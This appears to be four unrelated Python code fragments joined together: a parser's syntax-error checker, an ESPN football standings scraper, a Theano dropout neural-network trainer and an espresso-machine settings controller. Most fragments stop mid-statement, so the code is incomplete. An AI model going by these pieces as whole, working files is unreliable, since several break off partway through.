_MAX_BLOCK_SIZE = 20
_MAX_INDENT_COUNT = 100
ALLOWED_FUTURES = (
'all_feature_names', 'nested_scopes', 'generators', 'division',
'absolute_import', 'with_statement', 'print_function', 'unicode_literals',
)
def _iter_stmts(scope):
"""
Iterates over all statements and splits up simple_stmt.
"""
for child in scope.children:
if child.type == 'simple_stmt':
for child2 in child.children:
if child2.type == 'newline' or child2 == ';':
continue
yield child2
else:
yield child
def _get_comprehension_type(atom):
first, second = atom.children[:2]
if second.type == 'testlist_comp' and second.children[1].type == 'comp_for':
if first == '[':
return 'list comprehension'
else:
return 'generator expression'
elif second.type == 'dictorsetmaker' and second.children[-1].type == 'comp_for':
if second.children[1] == ':':
return 'dict comprehension'
else:
return 'set comprehension'
return None
def _is_future_import(import_from):
# It looks like a __future__ import that is relative is still a future
# import. That feels kind of odd, but whatever.
# if import_from.level != 0:
# return False
from_names = import_from.get_from_names()
return [n.value for n in from_names] == ['__future__']
def _remove_parens(atom):
"""
Returns the inner part of an expression like `(foo)`. Also removes nested
parens.
"""
try:
children = atom.children
except AttributeError:
pass
else:
if len(children) == 3 and children[0] == '(':
return _remove_parens(atom.children[1])
return atom
def _iter_params(parent_node):
return (n for n in parent_node.children if n.type == 'param')
def _is_future_import_first(import_from):
"""
Checks if the import is the first statement of a file.
"""
found_docstring = False
for stmt in _iter_stmts(import_from.get_root_node()):
if stmt.type == 'string' and not found_docstring:
continue
found_docstring = True
if stmt == import_from:
return True
if stmt.type == 'import_from' and _is_future_import(stmt):
continue
return False
def _iter_definition_exprs_from_lists(exprlist):
for child in exprlist.children[::2]:
if child.type == 'atom' and child.children[0] in ('(', '['):
testlist_comp = child.children[0]
if testlist_comp.type == 'testlist_comp':
for expr in _iter_definition_exprs_from_lists(testlist_comp):
yield expr
continue
elif child.children[0] == '[':
yield testlist_comp
continue
yield child
def _get_expr_stmt_definition_exprs(expr_stmt):
exprs = []
for list_ in expr_stmt.children[:-2:2]:
if list_.type in ('testlist_star_expr', 'testlist'):
exprs += _iter_definition_exprs_from_lists(list_)
else:
exprs.append(list_)
return exprs
def _get_for_stmt_definition_exprs(for_stmt):
exprlist = for_stmt.children[1]
if exprlist.type != 'exprlist':
return [exprlist]
return list(_iter_definition_exprs_from_lists(exprlist))
class _Context(object):
def __init__(self, node, add_syntax_error, parent_context=None):
self.node = node
self.blocks = []
self.parent_context = parent_context
self._used_name_dict = {}
self._global_names = []
self._nonlocal_names = []
self._nonlocal_names_in_subscopes = []
self._add_syntax_error = add_syntax_error
def is_async_funcdef(self):
# Stupidly enough async funcdefs can have two different forms,
# depending if a decorator is used or not.
return self.is_function() \
and self.node.parent.type in ('async_funcdef', 'async_stmt')
def is_function(self):
return self.node.type == 'funcdef'
def add_name(self, name):
parent_type = name.parent.type
if parent_type == 'trailer':
# We are only interested in first level names.
return
if parent_type == 'global_stmt':
self._global_names.append(name)
elif parent_type == 'nonlocal_stmt':
self._nonlocal_names.append(name)
else:
self._used_name_dict.setdefault(name.value, []).append(name)
def finalize(self):
"""
Returns a list of nonlocal names that need to be part of that scope.
"""
self._analyze_names(self._global_names, 'global')
self._analyze_names(self._nonlocal_names, 'nonlocal')
# Python2.6 doesn't have dict comprehensions.
global_name_strs = dict((n.value, n) for n in self._global_names)
for nonlocal_name in self._nonlocal_names:
try:
global_name = global_name_strs[nonlocal_name.value]
except KeyError:
continue
message = "name '%s' is nonlocal and global" % global_name.value
if global_name.start_pos < nonlocal_name.start_pos:
error_name = global_name
else:
error_name = nonlocal_name
self._add_syntax_error(error_name, message)
nonlocals_not_handled = []
for nonlocal_name in self._nonlocal_names_in_subscopes:
search = nonlocal_name.value
if search in global_name_strs or self.parent_context is None:
message = "no binding for nonlocal '%s' found" % nonlocal_name.value
self._add_syntax_error(nonlocal_name, message)
elif not self.is_function() or \
nonlocal_name.value not in self._used_name_dict:
nonlocals_not_handled.append(nonlocal_name)
return self._nonlocal_names + nonlocals_not_handled
def _analyze_names(self, globals_or_nonlocals, type_):
def raise_(message):
self._add_syntax_error(base_name, message % (base_name.value, type_))
params = []
if self.node.type == 'funcdef':
params = self.node.get_params()
for base_name in globals_or_nonlocals:
found_global_or_nonlocal = False
# Somehow Python does it the reversed way.
for name in reversed(self._used_name_dict.get(base_name.value, [])):
if name.start_pos > base_name.start_pos:
# All following names don't have to be checked.
found_global_or_nonlocal = True
parent = name.parent
if parent.type == 'param' and parent.name == name:
# Skip those here, these definitions belong to the next
# scope.
continue
if name.is_definition():
if parent.type == 'expr_stmt' \
and parent.children[1].type == 'annassign':
if found_global_or_nonlocal:
# If it's after the global the error seems to be
# placed there.
base_name = name
raise_("annotated name '%s' can't be %s")
break
else:
message = "name '%s' is assigned to before %s declaration"
else:
message = "name '%s' is used prior to %s declaration"
if not found_global_or_nonlocal:
raise_(message)
# Only add an error for the first occurence.
break
for param in params:
if param.name.value == base_name.value:
raise_("name '%s' is parameter and %s"),
@contextmanager
def add_block(self, node):
self.blocks.append(node)
yield
self.blocks.pop()
def add_context(self, node):
return _Context(node, self._add_syntax_error, parent_context=self)
def close_child_context(self, child_context):
self._nonlocal_names_in_subscopes += child_context.finalize()
class ErrorFinder(Normalizer):
"""
Searches for errors in the syntax tree.
"""
def __init__(self, *args, **kwargs):
super(ErrorFinder, self).__init__(*args, **kwargs)
self._error_dict = {}
self.version = self.grammar.version_info
def initialize(self, node):
def create_context(node):
if node is None:
return None
parent_context = create_context(node.parent)
if node.type in ('classdef', 'funcdef', 'file_input'):
return _Context(node, self._add_syntax_error, parent_context)
return parent_context
self.context = create_context(node) or _Context(node, self._add_syntax_error)
self._indentation_count = 0
def visit(self, node):
if node.type == 'error_node':
with self.visit_node(node):
# Don't need to investigate the inners of an error node. We
# might find errors in there that should be ignored, because
# the error node itself already shows that there's an issue.
return ''
return super(ErrorFinder, self).visit(node)
@contextmanager
def visit_node(self, node):
self._check_type_rules(node)
if node.type in _BLOCK_STMTS:
with self.context.add_block(node):
if len(self.context.blocks) == _MAX_BLOCK_SIZE:
self._add_syntax_error(node, "too many statically nested blocks")
yield
return
elif node.type == 'suite':
self._indentation_count += 1
if self._indentation_count == _MAX_INDENT_COUNT:
self._add_indentation_error(node.children[1], "too many levels of indentation")
yield
if node.type == 'suite':
self._indentation_count -= 1
elif node.type in ('classdef', 'funcdef'):
context = self.context
self.context = context.parent_context
self.context.close_child_context(context)
def visit_leaf(self, leaf):
if leaf.type == 'error_leaf':
if leaf.token_type in ('INDENT', 'ERROR_DEDENT'):
# Indents/Dedents itself never have a prefix. They are just
# "pseudo" tokens that get removed by the syntax tree later.
# Therefore in case of an error we also have to check for this.
spacing = list(leaf.get_next_leaf()._split_prefix())[-1]
if leaf.token_type == 'INDENT':
message = 'unexpected indent'
else:
message = 'unindent does not match any outer indentation level'
self._add_indentation_error(spacing, message)
else:
if leaf.value.startswith('\\'):
message = 'unexpected character after line continuation character'
else:
match = re.match('\\w{,2}("{1,3}|\'{1,3})', leaf.value)
if match is None:
message = 'invalid syntax'
else:
if len(match.group(1)) == 1:
message = 'EOL while scanning string literal'
else:
message = 'EOF while scanning triple-quoted string literal'
self._add_syntax_error(leaf, message)
return ''
elif leaf.value == ':':
parent = leaf.parent
if parent.type in ('classdef', 'funcdef'):
self.context = self.context.add_context(parent)
# The rest is rule based.
return super(ErrorFinder, self).visit_leaf(leaf)
def _add_indentation_error(self, spacing, message):
self.add_issue(spacing, 903, "IndentationError: " + message)
def _add_syntax_error(self, node, message):
self.add_issue(node, 901, "SyntaxError: " + message)
def add_issue(self, node, code, message):
# Overwrite the default behavior.
# Check if the issues are on the same line.
line = node.start_pos[0]
args = (code, message, node)
self._error_dict.setdefault(line, args)
def finalize(self):
self.context.finalize()
for code, message, node in self._error_dict.values():
self.issues.append(Issue(node, code, message))
class IndentationRule(Rule):
code = 903
def _get_message(self, message):
message = super(IndentationRule, self)._get_message(message)
return "IndentationError: " + message
@ErrorFinder.register_rule(type='error_node')
class _ExpectIndentedBlock(IndentationRule):
message = 'expected an indented block'
def get_node(self, node):
leaf = node.get_next_leaf()
return list(leaf._split_prefix())[-1]
def is_issue(self, node):
# This is the beginning of a suite that is not indented.
return node.children[-1].type == 'newline'
class ErrorFinderConfig(NormalizerConfig):
normalizer_class = ErrorFinder
class SyntaxRule(Rule):
code = 901
def _get_message(self, message):
message = super(SyntaxRule, self)._get_message(message)
return "SyntaxError: " + message
@ErrorFinder.register_rule(type='error_node')
class _InvalidSyntaxRule(SyntaxRule):
message = "invalid syntax"
def get_node(self, node):
return node.get_next_leaf()
def is_issue(self, node):
# Error leafs will be added later as an error.
return node.get_next_leaf().type != 'error_leaf'
@ErrorFinder.register_rule(value='await')
class _AwaitOutsideAsync(SyntaxRule):
message = "'await' outside async function"
def is_issue(self, leaf):
return not self._normalizer.context.is_async_funcdef()
def get_error_node(self, node):
# Return the whole await statement.
return node.parent
@ErrorFinder.register_rule(value='break')
class _BreakOutsideLoop(SyntaxRule):
message = "'break' outside loop"
def is_issue(self, leaf):
in_loop = False
for block in self._normalizer.context.blocks:
if block.type in ('for_stmt', 'while_stmt'):
in_loop = True
return not in_loop
@ErrorFinder.register_rule(value='continue')
class _ContinueChecks(SyntaxRule):
message = "'continue' not properly in loop"
message_in_finally = "'continue' not supported inside 'finally' clause"
| |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 7 13:24:29 2017
@author: ejreidelbach
"""
#------------------------------------------------------------------------------
# Obtain Rankings and Standings Information from the ESPN website
# -----------------------------------------------------------------------------
# Import the Required Libraries
import pandas as pd
import requests
from bs4 import BeautifulSoup
import os
import re
# 10 teams don't have team names (`list_orig`) that match the official NCAA stats page (`list_new`)
list_orig = ["BYU","Florida Intl","Hawai'i","Louisiana","Louisiana Monroe",
"Miami","UMass","NC State","SMU","Southern Mississippi","UT San Antonio"]
list_new = ["<NAME>","Florida International","Hawaii","Louisiana-Lafayette",
"Louisiana-Monroe","Miami (FL)","Massachusetts","North Carolina State",
"Southern Methodist","Southern Miss","UTSA"]
###############################################################################
# Function Definitions
# The following two functions are sourced from for human-sorting purposes:
# https://stackoverflow.com/questions/5967500/how-to-correctly-sort-a-string-with-a-number-inside
def atof(text):
try:
retval = float(text)
except ValueError:
retval = text
return retval
def natural_keys(text):
'''
alist.sort(key=natural_keys) sorts in human order
http://nedbatchelder.com/blog/200712/human_sorting.html
(See Toothy's implementation in the comments)
float regex comes from https://stackoverflow.com/a/12643073/190597
'''
return [ atof(c) for c in re.split(r'[+-]?([0-9]+(?:[.][0-9]*)?|[.][0-9]+)', text) ]
def site_to_soup(url):
headers = {"User-agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36"}
r = requests.get(url, headers=headers)
soup = BeautifulSoup(r.content,'html.parser')
return soup
def conf_standings(year=0):
''' This function will scrape the ESPN College Football API
and return all standings (i.e. wins/losses) for the specified year.
Standings returned will be based on the year specified in the input.
The function will also output a CSV file(s) to the `Conf Standings` folder.
- each year will result in a separate file
Years are currently limited to 2002 to PRESENT on ESPN.com.
Input:
year (int) - the year of the season being requested
* a default value of 0 will return all available years
Output:
1.A) If the default value of 0 is supplied for year, a dataframe
containing standings for all historical years on file will be returned.
1.B) If a specific year is supplied, a dataframe containing the standings
for that specific year will be returned.
2.) A CSV file for each year that is scraped..
'''
# Scrape the main rankings page to establish links for specific weeks/years
soup = site_to_soup("http://www.espn.com/college-football/standings")
# Grab Year Information
menu = soup.findAll('ul', class_='dropdown-menu med')[1]
years_list = []
years = menu.select('li')
for yr in years:
years_list.append(yr.text)
# If the user did not enter or a number or entered 0, grab all years.
# Otherwise, confirm the year that the user entered is available for
# scraping and then only grab that year.
if str(year) == '0':
pass
elif str(year) in years_list:
years_list = [str(year)]
else:
raise ValueError("Year entered is not in the range for ESPN's site.")
dfStandingsAll = pd.DataFrame()
# Grab Standing Information for the specified year(s)
for year in years_list:
print("Processing Rankings for Year: " + str(year))
soup = site_to_soup("http://www.espn.com/college-football/standings/_/season/" + str(year))
dfStandingsYear = pd.DataFrame()
# Grab the column header information
column_names = []
column_names.append('Conference') # Manually set the first item
column_names.append('Division') # Manually set the second item
column_names.append('School') # Manually set the third item
headings = soup.findAll('thead', {'class':'standings-categories'})[1]
cols = headings.findAll('span')[1:] # We don't need the division name so start at 1
for col in cols:
column_names.append(col.text)
column_names.append('Year')
# Add Conf to the front of the Conference PF and PA columns
column_names[4] = 'Conf PF'
column_names[5] = 'Conf PA'
# Add Over to the front of the Overall PF and PA columns
column_names[7] = 'Over PF'
column_names[8] = 'Over PA'
# Grab all the conference names
conferences = soup.findAll('h2', class_='table-caption')
# Grab all the divisions within each conference
standingsAll = soup.findAll('table', {'class':'standings has-team-logos'})
conf_count = 0
# Loop over each division in every conference and extract all ranking info
for division in standingsAll:
# setup storage variables
division_list = []
division_name = ''
# move through each team in the division
for row in division:
team_list = []
# Ignore rows that don't contain team/header information
if len(row) > 11:
# Grab the name of the division we're scraping
if row['class'][0] == 'standings-categories':
cols = row.findAll('span')
division_name = cols[0].text
# Collect team information for each team in the division
elif row['class'][0] == '':
# Add in conference name
team_list.append(conferences[conf_count].text)
# Add in division name
team_list.append(division_name)
# Extract team name
team_list.append(row.find('span', class_='team-names').text)
# Pull stat information
team_cols = row.findAll('td', {'style':'white-space:no-wrap;'})
for team_col in team_cols:
team_list.append(team_col.text)
# Add in the year we're scraping
team_list.append(str(year))
# If we scraped a team's row, add it to the division list
if len(team_list) > 0:
division_list.append(team_list)
# Add the division list to the overall standings dataframe
dfStandingsYear = dfStandingsYear.append(pd.DataFrame(division_list), ignore_index=False)
# Iterate to the next conference in the list
conf_count += 1
# Once the dataframe has been created, add in column-names
dfStandingsYear.columns = column_names
# Split the Division names such that we only retain the actual name
# (i.e. `East` or `West` vice `Big Ten - East` or `Big Ten - West`)
dfStandingsYear.Division = dfStandingsYear.Division.str.split(' - ').apply(lambda x: x[0] if len(x) == 1 else x[1])
# Remove the word `Conference` from Conference names
dfStandingsYear.Conference = dfStandingsYear.Conference.str.replace(' Conference', '')
# Split Conference Records into separate `Wins` and `Losses` columns
dfStandingsYear[['Conf W','Conf L']] = dfStandingsYear.CONF.str.split('-', expand=True, n=1)
# Split Overall Records into separate `Wins` and `Losses` columns
dfStandingsYear[['Over W','Over L']] = dfStandingsYear.OVER.str.split('-', expand=True, n=1)
# Split Home Records into separate `Wins` and `Losses` columns
dfStandingsYear[['Home W','Home L']] = dfStandingsYear.HOME.str.split('-', expand=True, n=1)
# Split Away Records into separate `Wins` and `Losses` columns
dfStandingsYear[['Away W','Away L']] = dfStandingsYear.AWAY.str.split('-', expand=True, n=1)
# Split Records vs AP Top 25 into separate `Wins` and `Losses` columns
dfStandingsYear[['AP W', 'AP L']] = dfStandingsYear.AP.str.split('-', expand=True, n=1)
# Split Records vs USA Top 25 into separate `Wins` and `Losses` columns
dfStandingsYear[['USA W', 'USA L']] = dfStandingsYear.USA.str.split('-', expand=True, n=1)
# Reorder all the columns in a preferable manner
dfStandingsYear = dfStandingsYear[['Conference','Division','School','Conf W','Conf L','Conf PF',
'Conf PA','Over W','Over L','Over PF','Over PA','Home W',
'Home L','Away W','Away L','STRK','AP W','AP L','USA W','USA L','Year']]
# Write Conference Standings to a CSV file
filename = 'Conf Standings/conf_standings_' + str(year) + '.csv'
dfStandingsYear.to_csv(filename, index=False)
# Append current year rankings to master dfStandings dataframe
dfStandingsAll = dfStandingsAll.append(dfStandingsYear)
# Write CSV containing all Years
dfStandingsAll.to_csv('Conf Standings/conf_standings_ALL.csv', index=False)
return dfStandingsAll
def poll_rankings(year=0):
''' This function will scrape the ESPN College Football API
and return all rankings for the specified year. Rankings returned will
be based on the year specified in the input.
The function will also output a CSV file(s) to the `Poll Rankings` folder.
- each year will result in a separate file
Years are currently limited to 2002 to PRESENT on ESPN.com.
Input:
year (int) - the year of the season being requested
* the default value of 0 will request all available years
Output:
1.) A dictionary which contains the ranking for the specifc year.
Exact rankings that will be returned depend on the year requested:
- 2002 to 2006:
* AP Poll
- 2007 to 2013:
* AP Poll, BCS Rankings***
*** BCS Rankings are only available beginning in week 9
- 2014 to PRESENT:
* AP Poll, CFP Rankings***
*** The CFP Rankings are only available beginning in week 10
2.) A CSV file for each year that is scraped containing all the data
in each dictionary and is then exported to the Data/Poll Rankings folder.
'''
# Scrape the main rankings page to establish links for specific weeks/years
soup = site_to_soup("http://www.espn.com/college-football/rankings")
# Grab Year Information
menu = soup.find('ul', class_='dropdown-menu med')
years_list = []
years = menu.select('li')
for li in years:
years_list.append(li.text)
# Determine what years should be scraped:
# If the user did not enter or a number or entered 0, grab all years.
# Otherwise, confirm the year that the user entered is available for
# scraping and then only grab that year.
if str(year) == '0':
pass
elif | |
"""
Deep Belief Net for MINST dataset
DBN uses the code found at: https://github.com/mdenil/dropout with modifications
Modified by <NAME>
Additional Modifications by <NAME>, <NAME>, <NAME>
Date: July 20, 2016
"""
import numpy as np
import pickle
import os, sys
import time
import matplotlib.pyplot as plt
from collections import OrderedDict
sys.path.append('/usr/local/lib/python2.7/dist-packages')
#sys.path.remove('/hanaconda/lib/python2.7/site-packages')
import theano
import theano.tensor as T
from theano.ifelse import ifelse
import theano.printing
import theano.tensor.shared_randomstreams
sys.path.append('anaconda/lib/python2.7/site-packages')
#sys.path.append('/home/xing/Documents/DBN/Glorot and Bengio/MINST')
from logistic_sgd import LogisticRegression
##################################
## Various activation functions ##
##################################
#### rectified linear unit
def ReLU(x):
y = T.nnet.relu(x)
return(y)
#### sigmoid
def Sigmoid(x):
y = T.nnet.sigmoid(x)
return(y)
#### tanh
def Tanh(x):
y = T.tanh(x)
return(y)
def load_data(dataset):
''' Loads the dataset
:type dataset: string
'''
#############
# LOAD DATA #
#############
print '... loading data'
all_data = pickle.load(open(dataset,"r"))
#Important: to shuffle the dataset
rng = np.random.RandomState(111)
rng.shuffle(all_data)
#pick up the number of training cases
number_of_training = 150
training_data = [];training_labels = []
testing_data = []; testing_labels = []
for datapoint in all_data[:number_of_training]:
training_data.append(datapoint[0])
training_labels.append(datapoint[1])
for datapoint in all_data[number_of_training:]:
testing_data.append(datapoint[0])
testing_labels.append(datapoint[1])
training_data = np.asarray(training_data)
training_labels = np.asarray(training_labels)
testing_data = np.asarray(testing_data)
testing_labels = np.asarray(testing_labels)
# print training_data[:5]
train_set = zip(training_data,training_labels)
test_set = zip(testing_data,testing_labels)
train_set = tuple(zip(*train_set))
test_set = tuple(zip(*test_set))
#train_set, valid_set, test_set format: tuple(input, target)
#input is an numpy.ndarray of 2 dimensions (a matrix)
#witch row's correspond to an example. target is a
#numpy.ndarray of 1 dimensions (vector)) that have the same length as
#the number of rows in the input. It should give the target
#target to the example with the same index in the input.
def shared_dataset(data_xy, borrow=True):
""" Function that loads the dataset into shared variables
The reason we store our dataset in shared variables is to allow
Theano to copy it into the GPU memory (when code is run on GPU).
Since copying data into the GPU is slow, copying a minibatch everytime
is needed (the default behaviour if the data is not in a shared
variable) would lead to a large decrease in performance.
"""
data_x, data_y = data_xy
shared_x = theano.shared(np.asarray(data_x,
dtype=theano.config.floatX),
borrow=borrow)
shared_y = theano.shared(np.asarray(data_y,
dtype=theano.config.floatX),
borrow=borrow)
# When storing data on the GPU it has to be stored as floats
# therefore we will store the labels as ``floatX`` as well
# (``shared_y`` does exactly that). But during our computations
# we need them as ints (we use labels as index, and if they are
# floats it doesn't make sense) therefore instead of returning
# ``shared_y`` we will have to cast it to int. This little hack
# lets ous get around this issue
return shared_x, T.cast(shared_y, 'int32')
test_set_x, test_set_y = shared_dataset(test_set)
train_set_x, train_set_y = shared_dataset(train_set)
rval = [(train_set_x, train_set_y), (test_set_x, test_set_y)]
return rval
class HiddenLayer(object):
def __init__(self, rng, input, n_in, n_out,
activation, W=None, b=None, Type = 'Xavier',
use_bias=False):
self.input = input
self.activation = activation
if W is None:
if Type == 'Xavier':
W_values = np.asarray(rng.uniform(
low=-np.sqrt(6. / (n_in + n_out)),
high=np.sqrt(6. / (n_in + n_out)),
size=(n_in, n_out)
),
dtype=theano.config.floatX)
W = theano.shared(value=W_values, name='W')
else:
W_values = np.asarray(0.01 * rng.standard_normal(
size=(n_in, n_out)), dtype=theano.config.floatX)
W = theano.shared(value=W_values, name='W')
if b is None:
b_values = np.zeros((n_out,), dtype=theano.config.floatX)
b = theano.shared(value=b_values, name='b')
self.W = W
self.b = b
if use_bias:
lin_output = T.dot(input, self.W) + self.b
else:
lin_output = T.dot(input, self.W)
self.output = (lin_output if activation is None else activation(lin_output))
# parameters of the model
if use_bias:
self.params = [self.W, self.b]
else:
self.params = [self.W]
def _dropout_from_layer(rng, layer, p):
"""p is the probablity of dropping a unit
"""
srng = theano.tensor.shared_randomstreams.RandomStreams(
rng.randint(999999))
# p=1-p because 1's indicate keep and p is prob of dropping
mask = srng.binomial(n=1, p=1-p, size=layer.shape)
# The cast is important because
# int * float32 = float64 which pulls things off the gpu
output = layer * T.cast(mask, theano.config.floatX)
return output
class DropoutHiddenLayer(HiddenLayer):
def __init__(self, rng, input, n_in, n_out,
activation, dropout_rate, use_bias, W=None, b=None):
super(DropoutHiddenLayer, self).__init__(
rng=rng, input=input, n_in=n_in, n_out=n_out, W=W, b=b,
activation=activation, use_bias=use_bias)
self.output = _dropout_from_layer(rng, self.output, p=dropout_rate)
class MLP(object):
"""A multilayer perceptron with all the trappings required to do dropout
training.
"""
def __init__(self,
rng,
input,
layer_sizes,
dropout_rates,
activations,
use_bias=True):
#rectified_linear_activation = lambda x: T.maximum(0.0, x)
# Set up all the hidden layers
weight_matrix_sizes = zip(layer_sizes, layer_sizes[1:])
self.layers = []
self.dropout_layers = []
next_layer_input = input
#first_layer = True
# dropout the input
next_dropout_layer_input = _dropout_from_layer(rng, input, p=dropout_rates[0])
layer_counter = 0
for n_in, n_out in weight_matrix_sizes[:-1]:
next_dropout_layer = DropoutHiddenLayer(rng=rng,
input=next_dropout_layer_input,
activation=activations[layer_counter],
n_in=n_in, n_out=n_out, use_bias=use_bias,
dropout_rate=dropout_rates[layer_counter + 1])
self.dropout_layers.append(next_dropout_layer)
next_dropout_layer_input = next_dropout_layer.output
# Reuse the paramters from the dropout layer here, in a different
# path through the graph.
next_layer = HiddenLayer(rng=rng,
input=next_layer_input,
activation=activations[layer_counter],
# scale the weight matrix W with (1-p)
W=next_dropout_layer.W * (1 - dropout_rates[layer_counter]),
b=next_dropout_layer.b,
n_in=n_in, n_out=n_out,
use_bias=use_bias)
self.layers.append(next_layer)
next_layer_input = next_layer.output
#first_layer = False
layer_counter += 1
# Set up the output layer
n_in, n_out = weight_matrix_sizes[-1]
dropout_output_layer = LogisticRegression(
rng,
input=next_dropout_layer_input,
n_in=n_in, n_out=n_out, use_bias=use_bias)
self.dropout_layers.append(dropout_output_layer)
# Again, reuse paramters in the dropout output.
output_layer = LogisticRegression(
rng,
input=next_layer_input,
# scale the weight matrix W with (1-p)
W=dropout_output_layer.W * (1 - dropout_rates[-1]),
b=dropout_output_layer.b,
n_in=n_in, n_out=n_out, use_bias=use_bias)
self.layers.append(output_layer)
# Use the negative log likelihood of the logistic regression layer as
# the objective.
self.dropout_negative_log_likelihood = self.dropout_layers[-1].negative_log_likelihood
self.dropout_errors = self.dropout_layers[-1].errors
self.negative_log_likelihood = self.layers[-1].negative_log_likelihood
self.errors = self.layers[-1].errors
# Grab all the parameters together.
self.params = [ param for layer in self.dropout_layers for param in layer.params ]
def test_mlp(
initial_learning_rate,
learning_rate_decay,
squared_filter_length_limit,
n_epochs,
batch_size,
mom_params,
activations,
dropout,
dropout_rates,
results_file_name,
layer_sizes,
dataset,
use_bias,
random_seed,
decay=True,
momentum=True,
L2=True,
plot = False):
"""
The dataset is the one from the mlp demo on deeplearning.net. This training
function is lifted from there almost exactly.
:type dataset: string
:param dataset: the path of the MNIST dataset file from
http://www.iro.umontreal.ca/~lisa/deep/data/mnist/mnist.pkl.gz
"""
assert len(layer_sizes) - 1 == len(dropout_rates)
# extract the params for momentum
mom_start = mom_params["start"]
mom_end = mom_params["end"]
mom_epoch_interval = mom_params["interval"]
datasets = load_data(dataset)
train_set_x, train_set_y = datasets[0]
test_set_x, test_set_y = datasets[1]
# compute number of minibatches for training, validation and testing
n_train_batches = train_set_x.get_value(borrow=True).shape[0] / batch_size
n_test_batches = test_set_x.get_value(borrow=True).shape[0] / batch_size
######################
# BUILD ACTUAL MODEL #
######################
print '... building the model'
# allocate symbolic variables for the data
index = T.lscalar() # index to a [mini]batch
epoch = T.scalar()
x = T.matrix('x') # the data is presented as rasterized images
y = T.ivector('y') # the labels are presented as 1D vector of
# [int] labels
learning_rate = theano.shared(np.asarray(initial_learning_rate,
dtype=theano.config.floatX))
rng = np.random.RandomState(random_seed)
# construct the MLP class
classifier = MLP(rng=rng, input=x,
layer_sizes=layer_sizes,
dropout_rates=dropout_rates,
activations=activations,
use_bias=use_bias)
# Build the expresson for the cost function.
if L2:
lamb = 0.00000001
cost = classifier.negative_log_likelihood(y)
dropout_cost = classifier.dropout_negative_log_likelihood(y)
if use_bias:
cost += lamb * sum([(classifier.params[i]**2).sum() for i in range(0,len(classifier.params),2)])/2*batch_size
dropout_cost += lamb * sum([(classifier.params[i]**2).sum() for i in range(0,len(classifier.params),2)])/2*batch_size
else:
cost += lamb *sum([(param**2).sum() for param in classifier.params])/2*batch_size
dropout_cost += lamb *sum([(param**2).sum() for param in classifier.params])/2*batch_size
else:
cost = classifier.negative_log_likelihood(y)
dropout_cost = classifier.dropout_negative_log_likelihood(y)
# Compile theano function for testing.
test_model = theano.function(inputs=[index],
outputs=classifier.errors(y),
givens={
x: test_set_x[index * batch_size:(index + 1) * batch_size],
y: test_set_y[index * batch_size:(index + 1) * batch_size]})
#theano.printing.pydotprint(test_model, outfile="test_file.png",
# var_with_name_simple=True)
# Compute gradients of the model wrt parameters
gparams = []
for param in classifier.params:
# Use the right cost function here to train with or without dropout.
gparam = T.grad(dropout_cost if dropout else cost, param)
gparams.append(gparam)
if momentum:
print >> sys.stderr, ("Using momentum")
# ... and allocate mmeory for momentum'd versions of the gradient
gparams_mom = []
for param in classifier.params:
gparam_mom = theano.shared(np.zeros(param.get_value(borrow=True).shape,
dtype=theano.config.floatX))
gparams_mom.append(gparam_mom)
# Compute momentum for the current epoch
mom = ifelse(epoch < mom_epoch_interval,
mom_start*(1.0 - epoch/mom_epoch_interval) + mom_end*(epoch/mom_epoch_interval),
mom_end)
# Update the step direction using momentum
updates = OrderedDict()
for gparam_mom, gparam in zip(gparams_mom, gparams):
# <NAME>'s original version
#updates[gparam_mom] = mom * gparam_mom + (1. - mom) * gparam
# change the update rule to match Hinton's dropout paper
updates[gparam_mom] = mom * gparam_mom - (1. - mom) * learning_rate * | |
#!/usr/bin/env python3
from api import api
from api import critical
import argparse
import logging
from logging.handlers import RotatingFileHandler
import numpy as np
import os
import re
import sys
import time
# create logger with 'rocket'
logger = logging.getLogger('rocket')
logger.setLevel(logging.DEBUG)
# create path of log file
path = os.path.dirname(os.path.realpath(__file__)) + '/logs/session.log'
# rotating session logs: perform a rollover before the next session begins
fh = RotatingFileHandler(path, mode='a', backupCount=10)
fh.doRollover()
# create file handler which logs even debug messages
fh = RotatingFileHandler(path, mode='w', backupCount=10)
fh.setLevel(logging.DEBUG)
# create console handler with a higher log level
sh = logging.StreamHandler(stream=sys.stdout)
sh.setLevel(logging.WARNING)
# create formatters and add them to the handlers
form_fh = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s', '%H:%M:%S')
form_sh = logging.Formatter('%(name)s - %(levelname)s - %(message)s')
fh.setFormatter(form_fh)
sh.setFormatter(form_sh)
# add the handlers to the logger
logger.addHandler(fh)
logger.addHandler(sh)
# set default pressure profiles
DefaultProfileA = np.array([[6, 4], [18, 9], [6, 5], [0, 0], [0, 0]])
DefaultProfileC = np.array([[20, 9], [10, 5], [0, 0], [0, 0], [0, 0]])
DefaultProfileB = np.array([[8, 4], [22, 9], [0, 0], [0, 0], [0, 0]])
class state:
# BYTE 0: temperature unit
__TemperatureUnit = ['Celsius', 'Fahrenheit']
def _set_temperatureUnit(self, x):
if x not in self.__TemperatureUnit:
self._log.warning('"{}" is not valid. Choose one of: {}!'.format(x, self.__TemperatureUnit))
else:
self._api.write(0, self.__TemperatureUnit.index(x))
temperatureUnit = property(
fset=_set_temperatureUnit,
fget=lambda self: self.__TemperatureUnit[self._api.read(0)],
fdel=None,
doc='Unit of temperature: Celsius/Fahrenheit')
# BYTE 1: language
__Language = ['English', 'German', 'French', 'Italian']
def _set_language(self, x):
if x not in self.__Language:
self._log.warning('"{}" is not valid. Choose one of: {}!'.format(x, self.__Language))
else:
self._api.write(1, self.__Language.index(x))
language = property(
fset=_set_language,
fget=lambda self: self.__Language[self._api.read(1)],
fdel=None,
doc='Selected language: English/German/French/Italian')
# BYTE 2: coffee temperature
# coffee boiler in degree Celsius
__Coffee_temp_C = [85, 115]
# coffee boiler in degree Fahrenheit
__Coffee_temp_F = [185, 239]
def _set_coffeeTemperature(self, x):
unit = self.temperatureUnit
if unit == 'Celsius':
self._check_range(x, self.__Coffee_temp_C, 'Temperature ')
elif unit == 'Fahrenheit':
self._check_range(x, self.__Coffee_temp_F, 'Temperature ')
else:
self._log.error('Temperature unit has a wrong state "{}"'.format(unit))
return
self._api.write(2, x)
coffeeTemperature = property(
fset=_set_coffeeTemperature,
fget=lambda self: self._api.read(2),
fdel=None,
doc='Temperature (in F or C) of coffee boiler: 85...115 °C')
# BYTE 3: steam temperature
# steam boiler in degree Celsius
__Steam_temp_C = [115, 125]
# steam boiler in degree Fahrenheit
__Steam_temp_F = [239, 257]
def _set_steamTemperature(self, x):
